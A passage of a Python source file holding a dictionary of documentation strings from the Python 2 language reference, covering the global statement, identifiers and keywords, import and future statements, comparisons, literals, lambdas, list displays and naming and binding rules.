See section Naming and binding for ' 'details.\n', 'global': '\n' 'The "global" statement\n' '**********************\n' '\n' ' global_stmt ::= "global" identifier ("," identifier)*\n' '\n' 'The "global" statement is a declaration which holds for the ' 'entire\n' 'current code block. It means that the listed identifiers are to ' 'be\n' 'interpreted as globals. It would be impossible to assign to a ' 'global\n' 'variable without "global", although free variables may refer to\n' 'globals without being declared global.\n' '\n' 'Names listed in a "global" statement must not be used in the same ' 'code\n' 'block textually preceding that "global" statement.\n' '\n' 'Names listed in a "global" statement must not be defined as ' 'formal\n' 'parameters or in a "for" loop control target, "class" definition,\n' 'function definition, or "import" statement.\n' '\n' '**CPython implementation detail:** The current implementation does ' 'not\n' 'enforce the latter two restrictions, but programs should not ' 'abuse\n' 'this freedom, as future implementations may enforce them or ' 'silently\n' 'change the meaning of the program.\n' '\n' '**Programmer\'s note:** the "global" is a directive to the ' 'parser. It\n' 'applies only to code parsed at the same time as the "global"\n' 'statement. In particular, a "global" statement contained in an ' '"exec"\n' 'statement does not affect the code block *containing* the "exec"\n' 'statement, and code contained in an "exec" statement is unaffected ' 'by\n' '"global" statements in the code containing the "exec" statement. ' 'The\n' 'same applies to the "eval()", "execfile()" and "compile()" ' 'functions.\n', 'id-classes': '\n' 'Reserved classes of identifiers\n' '*******************************\n' '\n' 'Certain classes of identifiers (besides keywords) have ' 'special\n' 'meanings. These classes are identified by the patterns of ' 'leading and\n' 'trailing underscore characters:\n' '\n' '"_*"\n' ' Not imported by "from module import *". 
The special ' 'identifier "_"\n' ' is used in the interactive interpreter to store the result ' 'of the\n' ' last evaluation; it is stored in the "__builtin__" module. ' 'When\n' ' not in interactive mode, "_" has no special meaning and is ' 'not\n' ' defined. See section The import statement.\n' '\n' ' Note: The name "_" is often used in conjunction with\n' ' internationalization; refer to the documentation for the\n' ' "gettext" module for more information on this ' 'convention.\n' '\n' '"__*__"\n' ' System-defined names. These names are defined by the ' 'interpreter\n' ' and its implementation (including the standard library). ' 'Current\n' ' system names are discussed in the Special method names ' 'section and\n' ' elsewhere. More will likely be defined in future versions ' 'of\n' ' Python. *Any* use of "__*__" names, in any context, that ' 'does not\n' ' follow explicitly documented use, is subject to breakage ' 'without\n' ' warning.\n' '\n' '"__*"\n' ' Class-private names. Names in this category, when used ' 'within the\n' ' context of a class definition, are re-written to use a ' 'mangled form\n' ' to help avoid name clashes between "private" attributes of ' 'base and\n' ' derived classes. See section Identifiers (Names).\n', 'identifiers': '\n' 'Identifiers and keywords\n' '************************\n' '\n' 'Identifiers (also referred to as *names*) are described by ' 'the\n' 'following lexical definitions:\n' '\n' ' identifier ::= (letter|"_") (letter | digit | "_")*\n' ' letter ::= lowercase | uppercase\n' ' lowercase ::= "a"..."z"\n' ' uppercase ::= "A"..."Z"\n' ' digit ::= "0"..."9"\n' '\n' 'Identifiers are unlimited in length. Case is significant.\n' '\n' '\n' 'Keywords\n' '========\n' '\n' 'The following identifiers are used as reserved words, or ' '*keywords* of\n' 'the language, and cannot be used as ordinary identifiers. 
' 'They must\n' 'be spelled exactly as written here:\n' '\n' ' and del from not while\n' ' as elif global or with\n' ' assert else if pass yield\n' ' break except import print\n' ' class exec in raise\n' ' continue finally is return\n' ' def for lambda try\n' '\n' 'Changed in version 2.4: "None" became a constant and is now ' 'recognized\n' 'by the compiler as a name for the built-in object "None". ' 'Although it\n' 'is not a keyword, you cannot assign a different object to ' 'it.\n' '\n' 'Changed in version 2.5: Using "as" and "with" as identifiers ' 'triggers\n' 'a warning. To use them as keywords, enable the ' '"with_statement"\n' 'future feature .\n' '\n' 'Changed in version 2.6: "as" and "with" are full keywords.\n' '\n' '\n' 'Reserved classes of identifiers\n' '===============================\n' '\n' 'Certain classes of identifiers (besides keywords) have ' 'special\n' 'meanings. These classes are identified by the patterns of ' 'leading and\n' 'trailing underscore characters:\n' '\n' '"_*"\n' ' Not imported by "from module import *". The special ' 'identifier "_"\n' ' is used in the interactive interpreter to store the result ' 'of the\n' ' last evaluation; it is stored in the "__builtin__" ' 'module. When\n' ' not in interactive mode, "_" has no special meaning and is ' 'not\n' ' defined. See section The import statement.\n' '\n' ' Note: The name "_" is often used in conjunction with\n' ' internationalization; refer to the documentation for ' 'the\n' ' "gettext" module for more information on this ' 'convention.\n' '\n' '"__*__"\n' ' System-defined names. These names are defined by the ' 'interpreter\n' ' and its implementation (including the standard library). ' 'Current\n' ' system names are discussed in the Special method names ' 'section and\n' ' elsewhere. More will likely be defined in future versions ' 'of\n' ' Python. 
*Any* use of "__*__" names, in any context, that ' 'does not\n' ' follow explicitly documented use, is subject to breakage ' 'without\n' ' warning.\n' '\n' '"__*"\n' ' Class-private names. Names in this category, when used ' 'within the\n' ' context of a class definition, are re-written to use a ' 'mangled form\n' ' to help avoid name clashes between "private" attributes of ' 'base and\n' ' derived classes. See section Identifiers (Names).\n', 'if': '\n' 'The "if" statement\n' '******************\n' '\n' 'The "if" statement is used for conditional execution:\n' '\n' ' if_stmt ::= "if" expression ":" suite\n' ' ( "elif" expression ":" suite )*\n' ' ["else" ":" suite]\n' '\n' 'It selects exactly one of the suites by evaluating the expressions ' 'one\n' 'by one until one is found to be true (see section Boolean operations\n' 'for the definition of true and false); then that suite is executed\n' '(and no other part of the "if" statement is executed or evaluated).\n' 'If all expressions are false, the suite of the "else" clause, if\n' 'present, is executed.\n', 'imaginary': '\n' 'Imaginary literals\n' '******************\n' '\n' 'Imaginary literals are described by the following lexical ' 'definitions:\n' '\n' ' imagnumber ::= (floatnumber | intpart) ("j" | "J")\n' '\n' 'An imaginary literal yields a complex number with a real part ' 'of 0.0.\n' 'Complex numbers are represented as a pair of floating point ' 'numbers\n' 'and have the same restrictions on their range. To create a ' 'complex\n' 'number with a nonzero real part, add a floating point number to ' 'it,\n' 'e.g., "(3+4j)". 
Some examples of imaginary literals:\n' '\n' ' 3.14j 10.j 10j .001j 1e100j 3.14e-10j\n', 'import': '\n' 'The "import" statement\n' '**********************\n' '\n' ' import_stmt ::= "import" module ["as" name] ( "," module ' '["as" name] )*\n' ' | "from" relative_module "import" identifier ' '["as" name]\n' ' ( "," identifier ["as" name] )*\n' ' | "from" relative_module "import" "(" ' 'identifier ["as" name]\n' ' ( "," identifier ["as" name] )* [","] ")"\n' ' | "from" module "import" "*"\n' ' module ::= (identifier ".")* identifier\n' ' relative_module ::= "."* module | "."+\n' ' name ::= identifier\n' '\n' 'Import statements are executed in two steps: (1) find a module, ' 'and\n' 'initialize it if necessary; (2) define a name or names in the ' 'local\n' 'namespace (of the scope where the "import" statement occurs). The\n' 'statement comes in two forms differing on whether it uses the ' '"from"\n' 'keyword. The first form (without "from") repeats these steps for ' 'each\n' 'identifier in the list. The form with "from" performs step (1) ' 'once,\n' 'and then performs step (2) repeatedly.\n' '\n' 'To understand how step (1) occurs, one must first understand how\n' 'Python handles hierarchical naming of modules. To help organize\n' 'modules and provide a hierarchy in naming, Python has a concept ' 'of\n' 'packages. A package can contain other packages and modules while\n' 'modules cannot contain other modules or packages. From a file ' 'system\n' 'perspective, packages are directories and modules are files.\n' '\n' 'Once the name of the module is known (unless otherwise specified, ' 'the\n' 'term "module" will refer to both packages and modules), searching ' 'for\n' 'the module or package can begin. The first place checked is\n' '"sys.modules", the cache of all modules that have been imported\n' 'previously. 
If the module is found there then it is used in step ' '(2)\n' 'of import.\n' '\n' 'If the module is not found in the cache, then "sys.meta_path" is\n' 'searched (the specification for "sys.meta_path" can be found in ' '**PEP\n' '302**). The object is a list of *finder* objects which are queried ' 'in\n' 'order as to whether they know how to load the module by calling ' 'their\n' '"find_module()" method with the name of the module. If the module\n' 'happens to be contained within a package (as denoted by the ' 'existence\n' 'of a dot in the name), then a second argument to "find_module()" ' 'is\n' 'given as the value of the "__path__" attribute from the parent ' 'package\n' '(everything up to the last dot in the name of the module being\n' 'imported). If a finder can find the module it returns a *loader*\n' '(discussed later) or returns "None".\n' '\n' 'If none of the finders on "sys.meta_path" are able to find the ' 'module\n' 'then some implicitly defined finders are queried. Implementations ' 'of\n' 'Python vary in what implicit meta path finders are defined. The ' 'one\n' 'they all do define, though, is one that handles "sys.path_hooks",\n' '"sys.path_importer_cache", and "sys.path".\n' '\n' 'The implicit finder searches for the requested module in the ' '"paths"\n' 'specified in one of two places ("paths" do not have to be file ' 'system\n' 'paths). If the module being imported is supposed to be contained\n' 'within a package then the second argument passed to ' '"find_module()",\n' '"__path__" on the parent package, is used as the source of paths. ' 'If\n' 'the module is not contained in a package then "sys.path" is used ' 'as\n' 'the source of paths.\n' '\n' 'Once the source of paths is chosen it is iterated over to find a\n' 'finder that can handle that path. The dict at\n' '"sys.path_importer_cache" caches finders for paths and is checked ' 'for\n' 'a finder. 
If the path does not have a finder cached then\n' '"sys.path_hooks" is searched by calling each object in the list ' 'with a\n' 'single argument of the path, returning a finder or raises\n' '"ImportError". If a finder is returned then it is cached in\n' '"sys.path_importer_cache" and then used for that path entry. If ' 'no\n' 'finder can be found but the path exists then a value of "None" is\n' 'stored in "sys.path_importer_cache" to signify that an implicit, ' 'file-\n' 'based finder that handles modules stored as individual files ' 'should be\n' 'used for that path. If the path does not exist then a finder ' 'which\n' 'always returns "None" is placed in the cache for the path.\n' '\n' 'If no finder can find the module then "ImportError" is raised.\n' 'Otherwise some finder returned a loader whose "load_module()" ' 'method\n' 'is called with the name of the module to load (see **PEP 302** for ' 'the\n' 'original definition of loaders). A loader has several ' 'responsibilities\n' 'to perform on a module it loads. First, if the module already ' 'exists\n' 'in "sys.modules" (a possibility if the loader is called outside of ' 'the\n' 'import machinery) then it is to use that module for initialization ' 'and\n' 'not a new module. But if the module does not exist in ' '"sys.modules"\n' 'then it is to be added to that dict before initialization begins. ' 'If\n' 'an error occurs during loading of the module and it was added to\n' '"sys.modules" it is to be removed from the dict. If an error ' 'occurs\n' 'but the module was already in "sys.modules" it is left in the ' 'dict.\n' '\n' 'The loader must set several attributes on the module. "__name__" ' 'is to\n' 'be set to the name of the module. "__file__" is to be the "path" ' 'to\n' 'the file unless the module is built-in (and thus listed in\n' '"sys.builtin_module_names") in which case the attribute is not ' 'set. 
If\n' 'what is being imported is a package then "__path__" is to be set ' 'to a\n' 'list of paths to be searched when looking for modules and ' 'packages\n' 'contained within the package being imported. "__package__" is ' 'optional\n' 'but should be set to the name of package that contains the module ' 'or\n' 'package (the empty string is used for module not contained in a\n' 'package). "__loader__" is also optional but should be set to the\n' 'loader object that is loading the module.\n' '\n' 'If an error occurs during loading then the loader raises ' '"ImportError"\n' 'if some other exception is not already being propagated. Otherwise ' 'the\n' 'loader returns the module that was loaded and initialized.\n' '\n' 'When step (1) finishes without raising an exception, step (2) can\n' 'begin.\n' '\n' 'The first form of "import" statement binds the module name in the\n' 'local namespace to the module object, and then goes on to import ' 'the\n' 'next identifier, if any. If the module name is followed by "as", ' 'the\n' 'name following "as" is used as the local name for the module.\n' '\n' 'The "from" form does not bind the module name: it goes through ' 'the\n' 'list of identifiers, looks each one of them up in the module found ' 'in\n' 'step (1), and binds the name in the local namespace to the object ' 'thus\n' 'found. As with the first form of "import", an alternate local ' 'name\n' 'can be supplied by specifying ""as" localname". If a name is not\n' 'found, "ImportError" is raised. If the list of identifiers is\n' 'replaced by a star ("\'*\'"), all public names defined in the ' 'module are\n' 'bound in the local namespace of the "import" statement..\n' '\n' 'The *public names* defined by a module are determined by checking ' 'the\n' 'module\'s namespace for a variable named "__all__"; if defined, it ' 'must\n' 'be a sequence of strings which are names defined or imported by ' 'that\n' 'module. 
The names given in "__all__" are all considered public ' 'and\n' 'are required to exist. If "__all__" is not defined, the set of ' 'public\n' "names includes all names found in the module's namespace which do " 'not\n' 'begin with an underscore character ("\'_\'"). "__all__" should ' 'contain\n' 'the entire public API. It is intended to avoid accidentally ' 'exporting\n' 'items that are not part of the API (such as library modules which ' 'were\n' 'imported and used within the module).\n' '\n' 'The "from" form with "*" may only occur in a module scope. If ' 'the\n' 'wild card form of import --- "import *" --- is used in a function ' 'and\n' 'the function contains or is a nested block with free variables, ' 'the\n' 'compiler will raise a "SyntaxError".\n' '\n' 'When specifying what module to import you do not have to specify ' 'the\n' 'absolute name of the module. When a module or package is ' 'contained\n' 'within another package it is possible to make a relative import ' 'within\n' 'the same top package without having to mention the package name. ' 'By\n' 'using leading dots in the specified module or package after "from" ' 'you\n' 'can specify how high to traverse up the current package hierarchy\n' 'without specifying exact names. One leading dot means the current\n' 'package where the module making the import exists. Two dots means ' 'up\n' 'one package level. Three dots is up two levels, etc. So if you ' 'execute\n' '"from . import mod" from a module in the "pkg" package then you ' 'will\n' 'end up importing "pkg.mod". If you execute "from ..subpkg2 import ' 'mod"\n' 'from within "pkg.subpkg1" you will import "pkg.subpkg2.mod". 
The\n' 'specification for relative imports is contained within **PEP ' '328**.\n' '\n' '"importlib.import_module()" is provided to support applications ' 'that\n' 'determine which modules need to be loaded dynamically.\n' '\n' '\n' 'Future statements\n' '=================\n' '\n' 'A *future statement* is a directive to the compiler that a ' 'particular\n' 'module should be compiled using syntax or semantics that will be\n' 'available in a specified future release of Python. The future\n' 'statement is intended to ease migration to future versions of ' 'Python\n' 'that introduce incompatible changes to the language. It allows ' 'use of\n' 'the new features on a per-module basis before the release in which ' 'the\n' 'feature becomes standard.\n' '\n' ' future_statement ::= "from" "__future__" "import" feature ["as" ' 'name]\n' ' ("," feature ["as" name])*\n' ' | "from" "__future__" "import" "(" feature ' '["as" name]\n' ' ("," feature ["as" name])* [","] ")"\n' ' feature ::= identifier\n' ' name ::= identifier\n' '\n' 'A future statement must appear near the top of the module. The ' 'only\n' 'lines that can appear before a future statement are:\n' '\n' '* the module docstring (if any),\n' '\n' '* comments,\n' '\n' '* blank lines, and\n' '\n' '* other future statements.\n' '\n' 'The features recognized by Python 2.6 are "unicode_literals",\n' '"print_function", "absolute_import", "division", "generators",\n' '"nested_scopes" and "with_statement". "generators", ' '"with_statement",\n' '"nested_scopes" are redundant in Python version 2.6 and above ' 'because\n' 'they are always enabled.\n' '\n' 'A future statement is recognized and treated specially at compile\n' 'time: Changes to the semantics of core constructs are often\n' 'implemented by generating different code. It may even be the ' 'case\n' 'that a new feature introduces new incompatible syntax (such as a ' 'new\n' 'reserved word), in which case the compiler may need to parse the\n' 'module differently. 
Such decisions cannot be pushed off until\n' 'runtime.\n' '\n' 'For any given release, the compiler knows which feature names ' 'have\n' 'been defined, and raises a compile-time error if a future ' 'statement\n' 'contains a feature not known to it.\n' '\n' 'The direct runtime semantics are the same as for any import ' 'statement:\n' 'there is a standard module "__future__", described later, and it ' 'will\n' 'be imported in the usual way at the time the future statement is\n' 'executed.\n' '\n' 'The interesting runtime semantics depend on the specific feature\n' 'enabled by the future statement.\n' '\n' 'Note that there is nothing special about the statement:\n' '\n' ' import __future__ [as name]\n' '\n' "That is not a future statement; it's an ordinary import statement " 'with\n' 'no special semantics or syntax restrictions.\n' '\n' 'Code compiled by an "exec" statement or calls to the built-in\n' 'functions "compile()" and "execfile()" that occur in a module "M"\n' 'containing a future statement will, by default, use the new ' 'syntax or\n' 'semantics associated with the future statement. This can, ' 'starting\n' 'with Python 2.2 be controlled by optional arguments to "compile()" ' '---\n' 'see the documentation of that function for details.\n' '\n' 'A future statement typed at an interactive interpreter prompt ' 'will\n' 'take effect for the rest of the interpreter session. If an\n' 'interpreter is started with the "-i" option, is passed a script ' 'name\n' 'to execute, and the script includes a future statement, it will be ' 'in\n' 'effect in the interactive session started after the script is\n' 'executed.\n' '\n' 'See also:\n' '\n' ' **PEP 236** - Back to the __future__\n' ' The original proposal for the __future__ mechanism.\n', 'in': '\n' 'Comparisons\n' '***********\n' '\n' 'Unlike C, all comparison operations in Python have the same priority,\n' 'which is lower than that of any arithmetic, shifting or bitwise\n' 'operation. 
Also unlike C, expressions like "a < b < c" have the\n' 'interpretation that is conventional in mathematics:\n' '\n' ' comparison ::= or_expr ( comp_operator or_expr )*\n' ' comp_operator ::= "<" | ">" | "==" | ">=" | "<=" | "<>" | "!="\n' ' | "is" ["not"] | ["not"] "in"\n' '\n' 'Comparisons yield boolean values: "True" or "False".\n' '\n' 'Comparisons can be chained arbitrarily, e.g., "x < y <= z" is\n' 'equivalent to "x < y and y <= z", except that "y" is evaluated only\n' 'once (but in both cases "z" is not evaluated at all when "x < y" is\n' 'found to be false).\n' '\n' 'Formally, if *a*, *b*, *c*, ..., *y*, *z* are expressions and *op1*,\n' '*op2*, ..., *opN* are comparison operators, then "a op1 b op2 c ... y\n' 'opN z" is equivalent to "a op1 b and b op2 c and ... y opN z", except\n' 'that each expression is evaluated at most once.\n' '\n' 'Note that "a op1 b op2 c" doesn\'t imply any kind of comparison ' 'between\n' '*a* and *c*, so that, e.g., "x < y > z" is perfectly legal (though\n' 'perhaps not pretty).\n' '\n' 'The forms "<>" and "!=" are equivalent; for consistency with C, "!="\n' 'is preferred; where "!=" is mentioned below "<>" is also accepted.\n' 'The "<>" spelling is considered obsolescent.\n' '\n' 'The operators "<", ">", "==", ">=", "<=", and "!=" compare the values\n' 'of two objects. The objects need not have the same type. If both are\n' 'numbers, they are converted to a common type. Otherwise, objects of\n' 'different types *always* compare unequal, and are ordered ' 'consistently\n' 'but arbitrarily. You can control comparison behavior of objects of\n' 'non-built-in types by defining a "__cmp__" method or rich comparison\n' 'methods like "__gt__", described in section Special method names.\n' '\n' '(This unusual definition of comparison was used to simplify the\n' 'definition of operations like sorting and the "in" and "not in"\n' 'operators. 
In the future, the comparison rules for objects of\n' 'different types are likely to change.)\n' '\n' 'Comparison of objects of the same type depends on the type:\n' '\n' '* Numbers are compared arithmetically.\n' '\n' '* Strings are compared lexicographically using the numeric\n' ' equivalents (the result of the built-in function "ord()") of their\n' ' characters. Unicode and 8-bit strings are fully interoperable in\n' ' this behavior. [4]\n' '\n' '* Tuples and lists are compared lexicographically using comparison\n' ' of corresponding elements. This means that to compare equal, each\n' ' element must compare equal and the two sequences must be of the ' 'same\n' ' type and have the same length.\n' '\n' ' If not equal, the sequences are ordered the same as their first\n' ' differing elements. For example, "cmp([1,2,x], [1,2,y])" returns\n' ' the same as "cmp(x,y)". If the corresponding element does not\n' ' exist, the shorter sequence is ordered first (for example, "[1,2] <\n' ' [1,2,3]").\n' '\n' '* Mappings (dictionaries) compare equal if and only if their sorted\n' ' (key, value) lists compare equal. [5] Outcomes other than equality\n' ' are resolved consistently, but are not otherwise defined. [6]\n' '\n' '* Most other objects of built-in types compare unequal unless they\n' ' are the same object; the choice whether one object is considered\n' ' smaller or larger than another one is made arbitrarily but\n' ' consistently within one execution of a program.\n' '\n' 'The operators "in" and "not in" test for collection membership. "x ' 'in\n' 's" evaluates to true if *x* is a member of the collection *s*, and\n' 'false otherwise. "x not in s" returns the negation of "x in s". The\n' 'collection membership test has traditionally been bound to sequences;\n' 'an object is a member of a collection if the collection is a sequence\n' 'and contains an element equal to that object. 
However, it make sense\n' 'for many other object types to support membership tests without being\n' 'a sequence. In particular, dictionaries (for keys) and sets support\n' 'membership testing.\n' '\n' 'For the list and tuple types, "x in y" is true if and only if there\n' 'exists an index *i* such that either "x is y[i]" or "x == y[i]" is\n' 'true.\n' '\n' 'For the Unicode and string types, "x in y" is true if and only if *x*\n' 'is a substring of *y*. An equivalent test is "y.find(x) != -1".\n' 'Note, *x* and *y* need not be the same type; consequently, "u\'ab\' ' 'in\n' '\'abc\'" will return "True". Empty strings are always considered to be ' 'a\n' 'substring of any other string, so """ in "abc"" will return "True".\n' '\n' 'Changed in version 2.3: Previously, *x* was required to be a string ' 'of\n' 'length "1".\n' '\n' 'For user-defined classes which define the "__contains__()" method, "x\n' 'in y" is true if and only if "y.__contains__(x)" is true.\n' '\n' 'For user-defined classes which do not define "__contains__()" but do\n' 'define "__iter__()", "x in y" is true if some value "z" with "x == z"\n' 'is produced while iterating over "y". If an exception is raised\n' 'during the iteration, it is as if "in" raised that exception.\n' '\n' 'Lastly, the old-style iteration protocol is tried: if a class defines\n' '"__getitem__()", "x in y" is true if and only if there is a non-\n' 'negative integer index *i* such that "x == y[i]", and all lower\n' 'integer indices do not raise "IndexError" exception. (If any other\n' 'exception is raised, it is as if "in" raised that exception).\n' '\n' 'The operator "not in" is defined to have the inverse true value of\n' '"in".\n' '\n' 'The operators "is" and "is not" test for object identity: "x is y" is\n' 'true if and only if *x* and *y* are the same object. "x is not y"\n' 'yields the inverse truth value. 
[7]\n', 'integers': '\n' 'Integer and long integer literals\n' '*********************************\n' '\n' 'Integer and long integer literals are described by the ' 'following\n' 'lexical definitions:\n' '\n' ' longinteger ::= integer ("l" | "L")\n' ' integer ::= decimalinteger | octinteger | hexinteger | ' 'bininteger\n' ' decimalinteger ::= nonzerodigit digit* | "0"\n' ' octinteger ::= "0" ("o" | "O") octdigit+ | "0" octdigit+\n' ' hexinteger ::= "0" ("x" | "X") hexdigit+\n' ' bininteger ::= "0" ("b" | "B") bindigit+\n' ' nonzerodigit ::= "1"..."9"\n' ' octdigit ::= "0"..."7"\n' ' bindigit ::= "0" | "1"\n' ' hexdigit ::= digit | "a"..."f" | "A"..."F"\n' '\n' 'Although both lower case "\'l\'" and upper case "\'L\'" are ' 'allowed as\n' 'suffix for long integers, it is strongly recommended to always ' 'use\n' '"\'L\'", since the letter "\'l\'" looks too much like the digit ' '"\'1\'".\n' '\n' 'Plain integer literals that are above the largest representable ' 'plain\n' 'integer (e.g., 2147483647 when using 32-bit arithmetic) are ' 'accepted\n' 'as if they were long integers instead. [1] There is no limit ' 'for long\n' 'integer literals apart from what can be stored in available ' 'memory.\n' '\n' 'Some examples of plain integer literals (first row) and long ' 'integer\n' 'literals (second and third rows):\n' '\n' ' 7 2147483647 0177\n' ' 3L 79228162514264337593543950336L 0377L 0x100000000L\n' ' 79228162514264337593543950336 0xdeadbeef\n', 'lambda': '\n' 'Lambdas\n' '*******\n' '\n' ' lambda_expr ::= "lambda" [parameter_list]: expression\n' ' old_lambda_expr ::= "lambda" [parameter_list]: old_expression\n' '\n' 'Lambda expressions (sometimes called lambda forms) have the same\n' 'syntactic position as expressions. They are a shorthand to ' 'create\n' 'anonymous functions; the expression "lambda arguments: ' 'expression"\n' 'yields a function object. 
The unnamed object behaves like a ' 'function\n' 'object defined with\n' '\n' ' def name(arguments):\n' ' return expression\n' '\n' 'See section Function definitions for the syntax of parameter ' 'lists.\n' 'Note that functions created with lambda expressions cannot ' 'contain\n' 'statements.\n', 'lists': '\n' 'List displays\n' '*************\n' '\n' 'A list display is a possibly empty series of expressions enclosed ' 'in\n' 'square brackets:\n' '\n' ' list_display ::= "[" [expression_list | ' 'list_comprehension] "]"\n' ' list_comprehension ::= expression list_for\n' ' list_for ::= "for" target_list "in" ' 'old_expression_list [list_iter]\n' ' old_expression_list ::= old_expression [("," old_expression)+ ' '[","]]\n' ' old_expression ::= or_test | old_lambda_expr\n' ' list_iter ::= list_for | list_if\n' ' list_if ::= "if" old_expression [list_iter]\n' '\n' 'A list display yields a new list object. Its contents are ' 'specified\n' 'by providing either a list of expressions or a list comprehension.\n' 'When a comma-separated list of expressions is supplied, its ' 'elements\n' 'are evaluated from left to right and placed into the list object ' 'in\n' 'that order. When a list comprehension is supplied, it consists of ' 'a\n' 'single expression followed by at least one "for" clause and zero ' 'or\n' 'more "for" or "if" clauses. In this case, the elements of the new\n' 'list are those that would be produced by considering each of the ' '"for"\n' 'or "if" clauses a block, nesting from left to right, and ' 'evaluating\n' 'the expression to produce a list element each time the innermost ' 'block\n' 'is reached [1].\n', 'naming': '\n' 'Naming and binding\n' '******************\n' '\n' '*Names* refer to objects. Names are introduced by name binding\n' 'operations. 
Each occurrence of a name in the program text refers ' 'to\n' 'the *binding* of that name established in the innermost function ' 'block\n' 'containing the use.\n' '\n' 'A *block* is a piece of Python program text that is executed as a\n' 'unit. The following are blocks: a module, a function body, and a ' 'class\n' 'definition. Each command typed interactively is a block. A ' 'script\n' 'file (a file given as standard input to the interpreter or ' 'specified\n' 'on the interpreter command line the first argument) is a code ' 'block.\n' 'A script command (a command specified on the interpreter command ' 'line\n' "with the '**-c**' option) is a code block. The file read by the\n" 'built-in function "execfile()" is a code block. The string ' 'argument\n' 'passed to the built-in function "eval()" and to the "exec" ' 'statement\n' 'is a code block. The expression read and evaluated by the ' 'built-in\n' 'function "input()" is a code block.\n' '\n' 'A code block is executed in an *execution frame*. A frame ' 'contains\n' 'some administrative information (used for debugging) and ' 'determines\n' "where and how execution continues after the code block's execution " 'has\n' 'completed.\n' '\n' 'A *scope* defines the visibility of a name within a block. If a ' 'local\n' 'variable is defined in a block, its scope includes that block. If ' 'the\n' 'definition occurs in a function block, the scope extends to any ' 'blocks\n' 'contained within the defining one, unless a contained block ' 'introduces\n' 'a different binding for the name. The scope of names defined in ' 'a\n' 'class block is limited to the class block; it does not extend to ' 'the\n' 'code blocks of methods -- this includes generator expressions ' 'since\n' 'they are implemented using a function scope. 
This means that the\n' 'following will fail:\n' '\n' ' class A:\n' ' a = 42\n' ' b = list(a + i for i in range(10))\n' '\n' 'When a name is used in a code block, it is resolved using the ' 'nearest\n' 'enclosing scope. The set of all such scopes visible to a code ' 'block\n' "is called the block's *environment*.\n" '\n' 'If a name is bound in a block, it is a local variable of that ' 'block.\n' 'If a name is bound at the module level, it is a global variable. ' '(The\n' 'variables of the module code block are local and global.) If a\n' 'variable is used in a code block but not defined there, it is a ' '*free\n' 'variable*.\n' '\n' 'When a name is not found at all, a "NameError" exception is ' 'raised.\n' 'If the name refers to a local variable that has not been bound, a\n' '"UnboundLocalError" exception is raised. "UnboundLocalError" is ' 'a\n' 'subclass of "NameError".\n' '\n' 'The following constructs bind names: formal parameters to ' 'functions,\n' '"import" statements, class and function definitions (these bind ' 'the\n' 'class or function name in the defining block), and targets that ' 'are\n' 'identifiers if occurring in an assignment, "for" loop header, in ' 'the\n' 'second position of an "except" clause header or after "as" in a ' '"with"\n' 'statement. The "import" statement of the form "from ... import ' '*"\n' 'binds all names defined in the imported module, except those ' 'beginning\n' 'with an underscore. This form may only be used at the module ' 'level.\n' '\n' 'A target occurring in a "del" statement is also considered bound ' 'for\n' 'this purpose (though the actual semantics are to unbind the ' 'name). 
It\n' 'is illegal to unbind a name that is referenced by an enclosing ' 'scope;\n' 'the compiler will report a "SyntaxError".\n' '\n' 'Each assignment or import statement occurs within a block defined ' 'by a\n' 'class or function definition or at the module level (the ' 'top-level\n' 'code block).\n' '\n' 'If a name binding operation occurs anywhere within a code block, ' 'all\n' 'uses of the name within the block are treated as references to ' 'the\n' 'current block. This can lead to errors when a name is used within ' 'a\n' 'block before it is bound. This rule is subtle. Python lacks\n' 'declarations and allows name binding operations to occur anywhere\n' 'within a code block. The local variables of a code block can be\n' 'determined by scanning the entire text of the block for name ' 'binding\n' 'operations.\n' '\n' 'If the global statement occurs within a block, all uses of the ' 'name\n' 'specified in the statement refer to the binding of that name in ' 'the\n' 'top-level namespace. Names are resolved in the top-level namespace ' 'by\n' 'searching the global namespace, i.e. the namespace of the module\n' 'containing the code block, and the builtins namespace, the ' 'namespace\n' 'of the module "__builtin__". The global namespace is searched ' 'first.\n' 'If the name is not found there, the builtins namespace is ' 'searched.\n' 'The global statement must precede all uses of the name.\n' '\n' 'The builtins namespace associated with the execution of a code ' 'block\n' 'is actually found by looking up the name "__builtins__" in its ' 'global\n' 'namespace; this should be a dictionary or a module (in the latter ' 'case\n' "the module's dictionary is used). By default, when in the " '"__main__"\n' 'module, "__builtins__" is the built-in module "__builtin__" (note: ' 'no\n' '\'s\'); when in any other module, "__builtins__" is an alias for ' 'the\n' 'dictionary of the "__builtin__" module itself. 
"__builtins__" can ' 'be\n' 'set to a user-created dictionary to create a weak form of ' 'restricted\n' 'execution.\n' '\n' '**CPython implementation detail:** Users should not touch\n' '"__builtins__"; it is strictly an implementation detail. Users\n' 'wanting to override values in the builtins namespace should ' '"import"\n' 'the "__builtin__" (no \'s\') module and modify its attributes\n' 'appropriately.\n' '\n' 'The namespace for a module is automatically created the first time ' 'a\n' 'module is imported. The main module for a script is always ' 'called\n' '"__main__".\n' '\n' 'The "global" statement has the same scope as a name binding ' 'operation\n' 'in the same block. If the nearest enclosing scope for a free ' 'variable\n' 'contains a global statement, the free variable is treated as a ' 'global.\n' '\n' 'A class definition is an executable statement that may use and ' 'define\n' 'names. These references follow the normal rules for name ' 'resolution.\n' 'The namespace of the class definition becomes the attribute ' 'dictionary\n' 'of the class. Names defined at the class scope are not visible ' 'in\n' 'methods.\n' '\n' '\n' 'Interaction with dynamic features\n' '=================================\n' '\n' 'There are several cases where Python statements are illegal when ' 'used\n' 'in conjunction with nested scopes that contain free variables.\n' '\n' 'If a variable is referenced in an enclosing scope, it is illegal ' 'to\n' 'delete the name. An error will be reported at compile time.\n' '\n' 'If the wild card form of import --- "import *" --- is used in a\n' 'function and the function contains or is a nested block with free\n' 'variables, the compiler will raise a "SyntaxError".\n' '\n' 'If "exec" is used in a function and the function contains or is a\n' 'nested block with free variables, the compiler will raise a\n' '"SyntaxError" unless the exec explicitly specifies the local ' 'namespace\n' 'for the "exec". 
